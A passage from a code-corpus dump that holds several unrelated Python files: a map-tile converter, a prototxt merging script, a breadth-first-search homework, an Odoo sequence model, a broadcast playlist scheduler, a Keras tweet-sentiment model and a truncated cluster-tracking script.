\"__main__\":\n maxscale = None\n ignorescales = set()\n poi = None\n debug = False\n list_contents = False\n content = None\n for a in sys.argv[1:]:\n M = re.match('-maxscale=([0-9]+)', a)\n if not M is None:\n sys.argv.remove(a)\n maxscale = int(M.group(1))\n continue\n M = re.match('-poi=([0-9.]+),([0-9.]+)', a)\n if not M is None:\n sys.argv.remove(a)\n poi = (float(M.group(1)), float(M.group(2)))\n continue\n M = re.match('-ignorescales=([0-9,]+)', a)\n if not M is None:\n sys.argv.remove(a)\n ignorescales = set([int(s) for s in M.group(1).split(',')])\n if a == \"-d\":\n debug = True\n sys.argv.remove(a)\n if a == \"-list_contents\":\n list_contents = True\n sys.argv.remove(a)\n M = re.match('-select_content=(.+)', a)\n if not M is None:\n sys.argv.remove(a)\n content = M.group(1)\n if a in ['-h', '--help', '/?']:\n help()\n if debug and poi is None:\n print(\"Debugging is only possible with -poi. Setting debug=False.\")\n debug = False\n if len(sys.argv) < 2 or (not list_contents and len(sys.argv) < 3):\n help()\n \n progress = SatmapFormat.NoProgress()\n mapRes, spotRes, routeRes = SatmapFormat.openMapDir(sys.argv[1], progress)\n \n def dictWalk(map, f, self):\n if not type(map) == type({}):\n f(map, self)\n else:\n for k in map.keys():\n dictWalk(map[k], f, self)\n \n def populateMapDisplay(m, self):\n assert len(m) == 3 and m[1] is None\n tc = TileHandling.TileContainer(m[0], progress)\n ig = self.append(tc)\n m[0] = tc\n m[1] = ig\n \n maps = []\n dictWalk(mapRes, populateMapDisplay, maps)\n \n maps.sort(key=lambda m: m.tiles[0].scale)\n\n if list_contents:\n print(\"Contents of map:\")\n contents = {}\n for m in maps:\n name = os.path.basename(m.name).split('@')[0]\n if not name in contents:\n contents[name] = dict(extends=m.extends[m.tiles[0].scale], scales=[])\n contents[name]['scales'].append(m.tiles[0].scale)\n contents[name]['extends']['lat_min'] = min(contents[name]['extends']['lat_min'], m.extends[m.tiles[0].scale]['lat_min'])\n contents[name]['extends']['lat_max'] = max(contents[name]['extends']['lat_max'], m.extends[m.tiles[0].scale]['lat_max'])\n contents[name]['extends']['long_min'] = min(contents[name]['extends']['long_min'], m.extends[m.tiles[0].scale]['long_min'])\n contents[name]['extends']['long_max'] = max(contents[name]['extends']['long_max'], m.extends[m.tiles[0].scale]['long_max'])\n for name in sorted(contents.keys()):\n print(\" Name:\", name, \n \"; Extend: (%.3f, %.3f) - (%.3f, %.3f)\" % (contents[name]['extends']['lat_min'], contents[name]['extends']['long_min'] , \n contents[name]['extends']['lat_max'] , contents[name]['extends']['long_max']), \n \"; Scales:\", sorted(contents[name]['scales']))\n print(\"Scales 50 - 1:200000, 100 - 1:100000, 200 - 1:50000, 400 - 1:25000, 800 - 1:12500\")\n os._exit(0)\n \n import pprint\n pprint.pprint([(m.extends, m.name) for m in maps])\n\n targetDir = sys.argv[2]\n \n if not maxscale is None or not len(ignorescales) == 0:\n if maxscale is None:\n maxscale = max([mm.tiles[0].scale for mm in maps])\n nmaps = list(filter(lambda mm: mm.tiles[0].scale <= maxscale and not mm.tiles[0].scale in ignorescales, maps))\n if len(nmaps) < len(maps):\n print(\"Filtered %d/%d maps maxscale=%d\" % (len(maps) - len(nmaps), len(maps), maxscale) )\n maps = nmaps\n else:\n print(\"-maxscale or -ignorescale given but did not match maps. Scales of maps: \", list([mm.tiles[0].scale for mm in maps]))\n sys.exit(1)\n \n if not content is None:\n nmaps = list(filter(lambda mm: os.path.basename(mm.name).split('@')[0] == content, maps))\n if len(nmaps) < len(maps) and len(nmaps) > 0:\n print(\"filtered %d/%d maps content=%s\" % (len(maps)-len(nmaps), len(maps), content))\n maps = nmaps\n else:\n print(\"-select_content filter wrong.\")\n \n start = datetime.datetime.now()\n \n transform = osm_adaptor.GlobalMercator()\n # get reasonable zoom levels\n # for that, use the center of the map\n dbres = []\n with ThreadPoolExecutor(max_workers=1) as dbthread:\n created_dbs = {}\n for m in maps:\n dbname = m.name.replace('/', '_')\n if '@' in dbname:\n dbname = dbname[:dbname.find('@')]\n if dbname in created_dbs:\n db = created_dbs[dbname]\n else: \n db = dbthread.submit(osm_adaptor.SqliteTileStorage, 'TMS').result()\n dbthread.submit(db.create, targetDir + '/map_%s.sqlitedb' % dbname, True).result()\n created_dbs[dbname] = db\n print (\"\\n\\nConverting\", m.name, \"to\", dbname)\n assert len(m.extends.keys()) == 1\n scale = list(m.extends.keys())[0]\n latc = (m.extends[scale]['lat_min'] + m.extends[scale]['lat_max'])*0.5\n longc = (m.extends[scale]['long_min'] + m.extends[scale]['long_max'])*0.5\n \n tileinfo = set([(tt.zone, tt.scale, tt.code) for tt in m.tiles])\n assert (len(tileinfo) == 1)\n ii = m.tiles[0].load()\n assert(ii.size == (m.tiles[0].w, m.tiles[0].h))\n \n #print(\"zone\", m.tiles[0].zone, \"scale\", m.tiles[0].scale, \"code\", m.tiles[0].code)\n # find tile containing center and adapt the longc, latc accordingly\n center_tiles = m.find_tiles_colliding(latc, longc, latc, longc, latc, longc, latc, longc)\n assert(len(center_tiles) >= 1)\n ct = center_tiles[0]\n longc = ct.long_min\n latc = ct.lat_min\n smx = ct.x_mc\n smy = ct.y_mc\n smx2 = smx + ct.w\n smy2 = smy + ct.h\n long2 = ct.long_max\n lat2 = ct.lat_max\n \n #smx, smy = TileHandling.deg2mapCoord(longc, latc, m.tiles[0].zone, m.tiles[0].scale, m.tiles[0].code)\n #smx2 = smx + m.tiles[0].w\n #smy2 = smy + m.tiles[0].h\n #long2, lat2 = TileHandling.mapCoord2deg(smx2, smy2, m.tiles[0].zone, m.tiles[0].scale, m.tiles[0].code)\n sm_density = abs((smx2 - smx)*(smy2-smy))/abs((long2-longc)*(lat2-latc))\n bestZoom = None\n bestDensityDelta = 0\n for zoom in range(osm_adaptor.MAXZOOMLEVEL):\n mx, my = transform.LatLonToMeters(latc, longc)\n px, py = transform.MetersToPixels(mx, my, zoom)\n px2 = px + transform.tileSize\n py2 = py + transform.tileSize\n mx, my = transform.PixelsToMeters(px2, py2, zoom)\n lat3, long3 = transform.MetersToLatLon(mx, my)\n osm_density = abs((px2-px)*(py2-py))/abs((lat3-latc)*(long3-longc))\n #print (\"zoom:\", zoom, math.sqrt(osm_density/sm_density), \"OSM:\", osm_density, (px2-px), (py2-py), (lat3-latc), (long3-longc), \"SM:\", sm_density, (smx2 - smx), (smy2-smy), (lat2-latc), (long2-longc) )\n if osm_density > sm_density and (bestZoom is None or abs(osm_density - sm_density) < bestDensityDelta):\n bestZoom = zoom\n bestDensityDelta = abs(osm_density - sm_density)\n bestOsmDensity = osm_density\n print (\"bestZoom:\", bestZoom, math.sqrt(bestOsmDensity/sm_density), \"OSM:\", bestOsmDensity, (px2-px), (py2-py), (lat3-latc), (long3-longc), \"SM:\", sm_density, (smx2 - smx), (smy2-smy), (lat2-latc), (long2-longc) )\n # now we are going to render new tiles with this zoom factor\n \n lat1 = m.extends[scale]['lat_min']\n lat2 = m.extends[scale]['lat_max']\n long1 = m.extends[scale]['long_min']\n long2 = m.extends[scale]['long_max']\n \n if not poi is None:\n long1 = poi[1]-0.005\n long2 = poi[1]+0.005\n lat1 = poi[0]-0.005\n lat2 = poi[1]+0.005\n workers = 1\n else:\n workers = 12\n \n mx, my = transform.LatLonToMeters(lat1, long1)\n px, py = transform.MetersToPixels(mx, my, bestZoom)\n tx1, ty1 = transform.PixelsToTile(px, py)\n tx = tx1\n ty = ty1\n n = 0\n with ThreadPoolExecutor(max_workers=workers) as executor:\n exres = []\n while 1:\n tx = tx1\n yCovered = False\n while 1:\n def work(tx, ty, bestZoom):\n p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon = transform.TileLatLonCorners(tx, ty, bestZoom)\n tile = m.render_tile(p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon, transform.tileSize, debug)\n if not tile is None:\n f = io.BytesIO(b'')\n tile = tile.convert('P', colors= 256, palette=Image.ADAPTIVE)\n tile.save(f, 'PNG', optimize = True)\n tile = f.getvalue()\n return p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon, tile, tx, ty, bestZoom\n exres.append(executor.submit(work, tx, ty, bestZoom))\n stopit = False\n while len(exres) > workers or (stopit and len(exres) > 0):\n p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon, tile, ctx, cty, cbestZoom = exres[0].result()\n exres = exres[1:]\n if not tile is None:\n #print(\"%d %d minLat=%.5f maxLat=%.5f minLong=%.5f maxLong=%.5f\" %( tx, ty, p1_lat, p3_lat, p1_lon, p3_lon))\n dbres.append(dbthread.submit(db.writeImage, ctx, cty, cbestZoom, tile))\n if len(dbres) > 10:\n while len(dbres) > 3:\n dbres[0].result()\n dbres = dbres[1:]\n maxLat = max(p1_lat, p2_lat, p3_lat, p4_lat)\n maxLong = max(p1_lon, p2_lon, p3_lon, p4_lon)\n if maxLat <= lat2:\n yCovered = True\n if maxLong > long2:\n stopit = True\n if stopit:\n break\n tx += 1\n n += 1\n \n if n == 200:\n wRatio = float(sum([mm.progress() for mm in maps]))/sum([len(mm.tiles) for mm in maps])\n if wRatio <= 0.0:\n wRatio = 0.000001\n curr = datetime.datetime.now()\n elapsed = curr - start\n total = elapsed / wRatio\n remaining = total - elapsed\n print(\"\\rProgress: %10.1f %% ETA: %s \" % (wRatio*100, str(remaining)), end=\"\")\n n = 0\n if not yCovered:\n break\n ty -= 1\n for dbname in created_dbs:\n dbthread.submit(created_dbs[dbname].close).result()\n print(\"\\n\\nDone\")\n \n","repo_name":"nooneisperfect/ReadYourMAPFile","sub_path":"convert_map.py","file_name":"convert_map.py","file_ext":"py","file_size_in_byte":12750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34157839176","text":"# USAGE\n# python calibr.py -i ../regular_rate_0.7/final.prototxt\n\n# by daniele.bagni@xilinx.com\n\n# ##################################################################################################\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.ufunc size changed\")\nimport numpy as np\n\nfrom datetime import datetime\nimport os\nimport sys\nimport argparse\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--fileinp1\", required=True, help=\"final prototxt file\")\nap.add_argument(\"-i\", \"--fileinp2\", required=True, help=\"header prototxt file\")\nap.add_argument(\"-o\", \"--fileout\", required=True, help=\"q_final prototxt file\")\nargs = vars(ap.parse_args())\n\nheader = args[\"fileinp2\"] # header_calibr.prototxt\"\nprotofile1 = args[\"fileinp1\"] # final prototxt file\nprotofile2 = args[\"fileout\" ] # q final prototxt file\n\ntry:\n f = open(header, \"r\")\nexcept IOError:\n print(\"cannot open \", header)\nelse:\n h_lines = f.readlines()\n h_tot_lines = len(h_lines)\n #print(header, \" has \", h_tot_lines, \" lines\")\nf.close()\n\ntry:\n f = open(protofile1, \"r\")\nexcept IOError:\n print(\"cannot open \", protofile1)\nelse:\n p_lines = f.readlines()\n p_tot_lines = len(p_lines)\n #print(protofile1, \" has \", p_lines, \" lines\")\nf.close()\n\nnew_lines = []\n\nfor ln1 in range(0, h_tot_lines):\n new_lines.append( h_lines[ln1] )\n\nfor ln2 in range(21, p_tot_lines):\n new_lines.append( p_lines[ln2] )\n\n#print(new_lines)\n\ntry:\n f = open(protofile2, \"w\")\nexcept IOError:\n print(\"cannot open \", protofile2)\nelse:\n f.writelines(new_lines)\nf.close()\n\n","repo_name":"Xilinx/Vitis-In-Depth-Tutorial","sub_path":"Machine_Learning/Design_Tutorials/01-caffe_cats_vs_dogs/files/deploy/alexnetBNnoLRN/pruned/calibr.py","file_name":"calibr.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"52"} +{"seq_id":"15452738656","text":"#Amarilda Celhaka\n#Hoemework #1\n#Breadth-First-Search Algorithm\n\nfrom collections import deque\n\ngraph = {'A': {'Z':75, 'S':140, 'T':118},\n 'Z': {'O':71},\n 'S': {'O':151,'F':99, 'R':80},\n 'T': {'L':111},\n 'O': {'S':151},\n 'F': {'B':211},\n 'R': {'P':97,'C':146},\n 'L': {'M':70},\n 'P': {'B':101},\n 'C': {'P':138,'C':138},\n 'M': {'D':75},\n 'D': {'C':120}\n }\n\n\n\ndef breadth_first_search(graph):\n\n #node with inital state (inital-state = Arad)\n inital_state = 'A' \n\n #setting goal state to B\n goal = 'B'\n \n #if initial state is equal to goal, than you reached the goal\n if inital_state == goal:\n return goal\n\n #defining frontier as a queue with node as the only element\n frontier = deque()\n frontier.append(inital_state)\n\n #defining explored as an empty set\n explored = []\n\n\n \n #enter a while loop that is always true, exit when frontier is empty or goal reached\n while True:\n\n #check if the frontier is empty, if yes return failure, otherwise expand the paths of the frontier\n if frontier:\n\n #poping the first element in the frontier\n main_path = frontier.popleft()\n\n #appending every explored node to the explored set\n explored.append(main_path)\n \n #main_path[-1] extraxts always the last element of the main_path\n node = main_path[-1]\n \n childs = graph[node]\n \n #traversing each leaf of the node in frontier\n for child in childs:\n #creating a path list for each traversed path\n paths = list(main_path)\n paths.append(child)\n frontier.append(paths)\n \n if child not in explored and child not in frontier:\n \n if child == goal:\n return paths\n \n frontier.append(child)\n\n #if frontier is empty \n else: \n return \"Failed: Frontier is empty!\"\n\n \nprint(\"Path from Arad to Bucharest:\")\n#calling the function to display the optimal path\nprint(breadth_first_search(graph))\n \n \n","repo_name":"Acelhaka/ArtificalIntelligence","sub_path":"homework#1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40507925717","text":"from odoo import api, fields, models\n\n\nclass IrSequence(models.Model):\n \"\"\"inherit ir.sequence to add fields and methods\"\"\"\n _inherit = \"ir.sequence\"\n\n account_journal_id = fields.Many2one('account.journal',\n help=\"To add the prefix entered in \"\n \"sequence to journal\",\n string=\"Journals\")\n\n @api.onchange('prefix')\n def _onchange_prefix(self):\n \"\"\"change the value in code field in account.journal model when\n value in prefix changed\"\"\"\n self.account_journal_id.code = self.prefix\n","repo_name":"CybroOdoo/CybroAddons","sub_path":"sequence_for_journal/models/ir_sequence.py","file_name":"ir_sequence.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"52"} +{"seq_id":"40200700996","text":"\"\"\"\n\nMain\n Primary block content\n\n block_split\n When selected, block is splitted after the first asset from primary pool is\n inserted.\n\n update_event_meta\n When block_split mode is active, this option updates parent event metadata\n (title, description and so on) using the inserted asset.\n\nJingles\n Appear anywhere within the block when \"span\" time is reached\n\nFill\n Used to fill empty space at the end of the block\n\n\n\"\"\"\n\nimport copy\nimport random\n\nfrom nxtools import logging, s2tc\n\nfrom nx.core.common import config as nebula_config\n\nfrom .common import DRAMATICA_DEFAULT_CONFIG\nfrom .pool import DramaticaPool\n\n\nclass Dramatica:\n def __init__(self, parent, settings):\n self.settings = copy.copy(DRAMATICA_DEFAULT_CONFIG)\n self.parent = parent\n\n for key, value in nebula_config.items():\n if key.startswith(\"dramatica_\"):\n nkey = key.replace(\"dramatica_\", \"\", 1)\n self[nkey] = value\n\n for key in settings:\n if type(settings[key]) != dict or key not in self.settings:\n self.settings[key] = settings[key]\n else:\n self.settings[key].update(settings[key])\n\n logging.info(f\"Initializing Dramatica for {self.parent.placeholder}\")\n\n self.last_attribs = {}\n self.new_assets = []\n\n self.position = 0\n self.last_jingle = 0\n self.most_common_vals = {}\n self.refine_cache = {}\n\n self.main_pools = []\n self.jingle_pools = []\n self.fill_pools = []\n\n for i, pool in enumerate(self.get(\"pools\", [])):\n self.main_pools.append(\n DramaticaPool(\n self, pool.get(\"filters\", {}), weight=pool.get(\"weight\", 1)\n )\n )\n\n jingles = self.get(\"jingles\")\n if jingles:\n for i, pool in enumerate(jingles.get(\"pools\", [])):\n self.jingle_pools.append(\n DramaticaPool(\n self,\n pool.get(\"filters\", {}),\n weight=pool.get(\"weight\", 1),\n reuse=True,\n )\n )\n\n fill = self.get(\"fill\")\n if fill:\n for i, pool in enumerate(fill.get(\"pools\", [])):\n self.fill_pools.append(\n DramaticaPool(\n self,\n pool.get(\"filters\", {}),\n weight=pool.get(\"weight\", 1),\n reuse=False,\n )\n )\n\n @property\n def target_duration(self):\n return min(self.parent.placeholder.duration, self.parent.needed_duration)\n\n @property\n def current_duration(self):\n return self.parent.current_duration\n\n @property\n def db(self):\n return self.parent.db\n\n def get_most_common(self, key):\n if key not in self.most_common_vals:\n values = [\n item.asset[key] for item in self.parent.new_items if item.asset[key]\n ]\n if not values:\n self.most_common_vals[key] = False\n self.most_common_vals[key] = max(values, key=values.count)\n return self.most_common_vals[key]\n\n def __setitem__(self, key, value):\n self.settings[\"key\"] = value\n\n def __getitem__(self, key):\n return self.settings.get(key)\n\n def get(self, key, default=None):\n return self.settings.get(key, default)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n asset = self.refine()\n self.new_assets.append(asset)\n return asset\n\n def refine(self):\n self.most_common_vals = {}\n self.refine_cache = {}\n\n if self.current_duration > self.target_duration:\n dur = s2tc(self.parent.current_duration)\n logging.info(f\"Iterator stopped with duration {dur}\")\n raise StopIteration\n\n #\n # Jingles\n #\n\n jingle_pool_ids = []\n for i, pool in enumerate(self.jingle_pools):\n if pool.pool:\n jingle_pool_ids.extend([i] * pool.weight)\n\n if jingle_pool_ids:\n if self.position - self.last_jingle > self.get(\"jingles\", {}).get(\n \"distance\", 800\n ):\n current_pool_id = random.choice(jingle_pool_ids)\n pool = self.jingle_pools[current_pool_id]\n asset = pool.refine()\n if asset:\n for j in jingle_pool_ids:\n if current_pool_id == j:\n continue\n self.jingle_pools[j].mark_used(asset.id)\n self.position += asset.duration\n self.last_jingle = self.position\n return asset\n\n #\n # Main\n #\n\n main_pool_ids = []\n for i, pool in enumerate(self.main_pools):\n main_pool_ids.extend([i] * pool.weight)\n\n asset = None\n if main_pool_ids:\n current_pool_id = random.choice(main_pool_ids)\n asset = self.main_pools[current_pool_id].refine()\n if asset:\n\n for j in main_pool_ids:\n if current_pool_id == j:\n continue\n self.main_pools[j].mark_used(asset.id)\n\n self.position += asset.duration\n\n if self[\"block_split\"]:\n if self.get(\"update_event_meta\", True):\n for key in asset.meta.keys():\n if key in [\"title\", \"subtitle\", \"description\"]:\n value = asset[key]\n if value:\n self.parent.event[key] = value\n self.parent.event[\"id_asset\"] = asset.id\n self.parent.event.save()\n\n split_position = self.parent.event[\"start\"] + self.position\n split_position += 300\n split_position -= split_position % 300\n\n self.parent.block_split(split_position)\n self.main_pools = []\n\n return asset\n\n fill_pool_ids = []\n for i, pool in enumerate(self.fill_pools):\n fill_pool_ids.extend([i] * pool.weight)\n\n if fill_pool_ids:\n current_pool_id = random.choice(fill_pool_ids)\n pool = self.fill_pools[current_pool_id]\n asset = pool.refine()\n if asset:\n for j in fill_pool_ids:\n if current_pool_id == j:\n continue\n self.fill_pools[j].mark_used(asset.id)\n self.position += asset.duration\n return asset\n\n raise StopIteration\n","repo_name":"immstudios/dramatica","sub_path":"dmtc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6878,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"11455395795","text":"# Imports\nimport numpy as np\nimport re\nimport collections\nfrom pathlib import Path\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils.np_utils import to_categorical\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras import models\nfrom keras import layers\nfrom keras.layers import Embedding\nimport pandas as pd\n\n# Parameters\nNB_WORDS = 10000 # Parameter indicating the number of words we'll put in the dictionary\nVAL_SIZE = 1000 # Size of the validation set\nNB_START_EPOCHS = 200 # Number of epochs we usually start to train with\nBATCH_SIZE = 64 # Size of the batches used in the mini-batch gradient descent\nMAX_LEN = 30 # Maximum number of words in a sequence\nGLOVE_DIM = 300 # Number of dimensions of the GloVe word embeddings\nroot = Path('./')\ninput_path = root / 'input/'\nouput_path = root / 'output/'\nsource_path = root / 'source/'\n\n# Preparation \ndf = pd.read_csv(input_path / 'Tweets.csv')\ndf = df.reindex(np.random.permutation(df.index))\ndf = df[['text', 'airline_sentiment']] \nX_train, X_test, y_train, y_test = train_test_split(df.text, df.airline_sentiment, test_size=0.1, random_state=37)\n\n# Tokenize text\ntk = Tokenizer(num_words=NB_WORDS,\nfilters='!\"#$%&()*+,-./:;<=>?@[\\]^_`{\"}~\\t\\n',lower=True, split=\" \")\ntk.fit_on_texts(X_train) # tokenizer train\ntk.fit_on_texts(X_test) # tokenizer test\nX_train_seq = tk.texts_to_sequences(X_train)\nX_test_seq = tk.texts_to_sequences(X_test)\n\n# We set all sequences to an equal size\nX_train_seq_trunc = pad_sequences(X_train_seq, maxlen=MAX_LEN)\nX_test_seq_trunc = pad_sequences(X_test_seq, maxlen=MAX_LEN)\n\n# Change sentiment classes to numeric values\nle = LabelEncoder()\ny_train_le = le.fit_transform(y_train)\ny_test_le = le.transform(y_test)\ny_train_oh = to_categorical(y_train_le)\ny_test_oh = to_categorical(y_test_le)\n\nsaved_model = models.Sequential()\nsaved_model.add(layers.Embedding(NB_WORDS, 100, input_length=MAX_LEN))\nsaved_model.add(layers.Flatten())\nsaved_model.add(layers.Dense(3, activation='softmax'))\nsaved_model.load_weights(\"./emb_model.h5\")\n\n# Network architecture\nemb_model = models.Sequential()\nemb_model.add(layers.Embedding(NB_WORDS, 100, input_length=MAX_LEN, weights=saved_model.layers[0].get_weights(), trainable=False ))\n#emb_model.add(layers.GRU(128, return_sequences=True))\nemb_model.add(layers.GRU(128, return_sequences=True))\nemb_model.add(layers.GRU(128))\n#emb_model.add(layers.Dense(256, activation='relu'))\nemb_model.add(layers.Dense(1024, activation='relu'))\n#emb_model.add(layers.Flatten())\nemb_model.add(layers.Dense(3, activation='softmax'))\n\n#Compile model\nemb_model.compile(optimizer='sgd', loss='categorical_crossentropy',metrics=['accuracy'])\n\nprint(emb_model.summary(), 'summary')\n\n#Train model\nemb_history = emb_model.fit(X_train_seq_trunc, y_train_oh, batch_size=BATCH_SIZE, nb_epoch=NB_START_EPOCHS, validation_split=0.1)\n\n#Evaluate the model with test set\nscore = emb_model.evaluate(X_test_seq_trunc, y_test_oh, verbose=0)\nprint('test loss:', score[0])\nprint('test accuracy:', score[1])\n\n##Store Plots\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nplt.plot(emb_history.history['acc'])\nplt.plot(emb_history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\n#No validation loss in this example\nplt.legend(['train','val'], loc='upper left')\nplt.savefig('model_accuracy.png')\nplt.close()\n#Loss plot\nplt.plot(emb_history.history['loss'])\nplt.plot(emb_history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train','val'], loc='upper left')\nplt.savefig('model_loss.png')\n\n#Confusion Matrix\nfrom sklearn.metrics import classification_report,confusion_matrix\nY_pred = emb_model.predict(X_test_seq_trunc)\ny_pred = np.argmax(Y_pred, axis=1)\n\n#Plot statistics\nprint('Analysis of results')\ntarget_names = ['Negative', 'Neutral', 'Positive']\nprint(classification_report(np.argmax(y_test_oh,axis=1), y_pred,target_names=target_names))\nprint(confusion_matrix(np.argmax(y_test_oh,axis=1), y_pred))\n\n#emb_model.save_weights(\"emb_model.h5\")\n\n'''\n\n# Glove wiki embeddings\nglove_file = 'glove.6B.' + str(GLOVE_DIM) + 'd.txt'\nemb_dict = {}\nglove = open(source_path / glove_file)\nfor line in glove:\n values = line.split()\n word = values[0]\n vector = np.asarray(values[1:], dtype='float32')\n emb_dict[word] = vector\nglove.close()\n\n# Store embeddings to matrix NB_WORDS x GLOVE_DIM\nemb_matrix = np.zeros((NB_WORDS, GLOVE_DIM))\nfor w, i in tk.word_index.items():\n\tif i < NB_WORDS:\n\t\tvect = emb_dict.get(w)\n\t\tif vect is not None:\n\t\t\temb_matrix[i] = vect\n\telse:\n\t\tbreak\n\n# Define the same network as for computed embeddings\nglove_model = models.Sequential()\nglove_model.add(layers.Embedding(NB_WORDS, GLOVE_DIM, input_length=MAX_LEN))\n#glove_model.add(layers.Conv1D(128, 5, activation='relu', input_shape=(None, 24, 300) ))\n#glove_model.add(layers.MaxPooling1D(pool_size=5, strides=1))\nglove_model.add(layers.Flatten())\n#glove_model.add(layers.GRU(128, return_sequences=True))\n#glove_model.add(layers.GRU(128, return_sequences=True))\n#glove_model.add(layers.GRU(128))\nglove_model.add(layers.Dense(1024, activation='relu'))\nglove_model.add(layers.Dense(3, activation='softmax'))\n\n# Set values and disable learning\nglove_model.layers[0].set_weights([emb_matrix]) # Set weights of the embedding layer to the glove values \nglove_model.layers[0].trainable = False # Do not let network to modify these values\n\n#Compile model\nglove_model.compile(optimizer='sgd',loss='categorical_crossentropy',metrics=['accuracy'])\n\nprint(glove_model.summary(), 'summary')\n\n#Train model\nglove_history = glove_model.fit(X_train_seq_trunc, y_train_oh, batch_size=BATCH_SIZE, nb_epoch=NB_START_EPOCHS, validation_split=0.1)\n\n#Evaluate the model with test set\nglove_score = glove_model.evaluate(X_test_seq_trunc, y_test_oh, verbose=0)\nprint('test loss:', glove_score[0])\nprint('test accuracy:', glove_score[1])\n\n##Store glove Plots\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nplt.plot(glove_history.history['acc'])\nplt.plot(glove_history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\n#No validation loss in this example\nplt.legend(['train','val'], loc='upper left')\nplt.savefig('glove_model_accuracy.png')\nplt.close()\n#Loss plot\nplt.plot(glove_history.history['loss'])\nplt.plot(glove_history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train','val'], loc='upper left')\nplt.savefig('glove_model_loss.png')\n\n#Confusion Matrix\nfrom sklearn.metrics import classification_report,confusion_matrix\nY_pred = glove_model.predict(X_test_seq_trunc)\ny_pred = np.argmax(Y_pred, axis=1)\n\n#Plot statistics\nprint('Analysis of results')\ntarget_names = ['Negative', 'Neutral', 'Positive']\nprint(classification_report(np.argmax(y_test_oh,axis=1), y_pred,target_names=target_names))\nprint(confusion_matrix(np.argmax(y_test_oh,axis=1), y_pred))\n\n'''\n","repo_name":"xdolnak/UPC-DL","sub_path":"second_assignment_embedding/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24406616168","text":"import numpy as np\n\ndef execute(clust_i, clust_j, age_j):\n \n X_1, y_1, c1 = clust_i\n X_2, y_2, c2 = clust_j\n \n clu_index_1 = {}\n for clu in np.unique(y_1):\n clu_index_1[clu] = cluster_index(X_1, y_1, clu)\n \n clu_index_2 = {}\n for clu in np.unique(y_2):\n clu_index_2[clu] = cluster_index(X_2, y_2, clu)\n \n overlap_m = overlap_matrix(clu_index_1, clu_index_2, age_j)\n \n print(overlap_m)\n \n deaths, split_list, absor_sur = [], [], []\n for i in clu_index_1.keys():\n split_cand, split_union = [], []\n surv_cand = -1\n \n for j in clu_index_2.keys():\n \n mcell = overlap_m[i][j]\n \n if(mcell > 0.5):\n if(mcell > surv_cand):\n surv_cand = j\n elif(mcell > 0.25):\n split_cand.append(j)\n split_union.append(clu_index_2[j])\n \n if(surv_cand == -1 and split_cand == []):\n deaths.append(i)\n elif(split_cand != []):\n if (overlap(clu_index_1[i], split_union) > 0.5):\n for j in split_cand:\n split_list.append([i,j])\n else:\n deaths.append(i)\n else:\n \n absor_sur.append([i, surv_cand])\n \n absor_list, surv_list = [], []\n \n for j in clu_index_2.keys():\n absor_cand = get_candidates(absor_sur, j)\n \n print(absor_cand)\n \n if(len(absor_cand) > 1): \n for i in absor_cand:\n absor_list.append([i,j])\n \n elif(absor_cand[0] == j):\n surv_list.append([absor_cand[0],j])\n \n print(\"----------------\")\n print(\"Absorvidos: \" + str(absor_list))\n print(\"Sobrevivência: \" + str(surv_list))\n print(\"Separações: \" + str(split_list))\n print(\"Mortes: \" + str(deaths))\n \n \ndef get_candidates(absor_sur, j):\n \n absortion_cand = []\n \n for i in range(len(absor_sur)):\n if(absor_sur[i][1] == j):\n absortion_cand.append(absor_sur[i][0])\n return absortion_cand\n \n \n\n\ndef overlap_matrix(clu_index_1, clu_index_2, age_y):\n \n size = {}\n overlaps = {}\n for i in clu_index_1.keys():\n overlaps[i] = []\n #size[i] = []\n #size[i].append(len(clu_index_1[i]))\n \n for j in clu_index_1.keys():\n \n if(j not in clu_index_2.keys()):\n overlaps[i].append(0) \n else:\n overlaps[i].append(overlap(clu_index_1[i], clu_index_2[j], age_y))\n #size[i].append(len(clu_index_2[j]))'\n \n return overlaps\n \n \n\ndef overlap(c1, c2, age_j):\n \n #print(c1)\n #print(c2)\n \n inters_index = set(c1).intersection(c2)\n #print(inters_index)\n \n int_sum = 0\n for i in inters_index:\n int_sum = int_sum + age_j[i]\n \n int_clus = 0\n for i in c1:\n int_clus = int_clus + age_j[i] \n \n #print(int_sum/int_clus)\n \n #print(\"-------------\")\n \n \n return int_sum/int_clus\n\ndef match(overlaps, size):\n \n matchs = {}\n for i in overlaps.keys():\n if(max(overlaps[i]) < 0.5):\n matchs[i] = None\n elif(max(overlaps[i]) == 0.5 and 0.5 in 